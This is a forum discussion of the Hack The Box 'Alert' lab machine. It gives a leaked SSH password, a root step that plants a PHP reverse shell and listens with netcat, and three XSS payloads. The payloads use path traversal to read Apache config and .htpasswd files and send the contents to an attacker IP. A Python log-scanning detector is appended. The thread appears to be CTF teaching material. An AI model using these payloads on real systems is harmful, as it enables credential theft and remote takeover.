Hackthebox - Alert [Discussion] [HTB]

Let’s discuss Alert from hackthebox

To get user flag:

ssh -L 8080:127.0.0.1:8080 albert@alert.htb
Password: manchesterunited

To get Root Flag:
Add a php rev shell in /opt/website-monitor/config

then nc -lnvp <Your Listening Port>
then visit http://127.0.0.1:8080/config/revshell.php

Voila! You got Root!

How were you able to get the user and pass? Was it via xss?

First:

<script> fetch("http://alert.htb/")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Second:

<script> fetch("http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Third:

<script> fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

After you click send (make sure you do this 3 times), you will get URL-encoded responses from the Python server.

For the first one, upload the file and then click View Markdown
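
Added example, not part of the thread or any poster's code: a Python sketch of the path containment check that rejects the `file` values shown above, used here to flag such requests in constructed access-log lines. `BASE_DIR`, the function names and the log lines are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the directory the viewer is meant to read from (not stated in the thread).
BASE_DIR = "/var/www/alert.htb/messages"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def resolve_under(base, requested):
    """Return the normalised path if it stays inside base, else None.
    Lexical check only; a server-side guard should also resolve symlinks."""
    if "\x00" in requested:
        return None
    candidate = posixpath.normpath(posixpath.join(base, requested))
    if candidate.startswith(base + "/"):
        return candidate
    return None

def flag_traversal(log_lines, endpoint="/messages.php", param="file"):
    """Return (line_no, decoded_value) for requests whose file parameter escapes BASE_DIR."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != endpoint:
            continue
        # parse_qs percent-decodes, so encoded "../" sequences are caught too.
        for value in parse_qs(url.query).get(param, []):
            if resolve_under(BASE_DIR, value) is None:
                hits.append((n, value))
    return hits

# Constructed access-log lines; lines 2 and 3 mirror the request shapes in the thread.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2025:10:00:00 +0000] "GET /messages.php?file=note1.txt HTTP/1.1" 200 120',
    '127.0.0.1 - - [01/Jan/2025:10:00:05 +0000] "GET /messages.php?file=../../../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1043',
    '127.0.0.1 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=%2e%2e%2f%2e%2e%2fstatistics.alert.htb/.htpasswd HTTP/1.1" 200 57',
    '127.0.0.1 - - [01/Jan/2025:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, value in flag_traversal(SAMPLE_LOG):
        print(f"line {line_no}: file={value!r} resolves outside {BASE_DIR}")
```

The same `resolve_under` logic, placed in front of the file read, is the fix for the endpoint itself; the log scan only tells you it was probed.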

I just posted a writeup, you can check 🥲
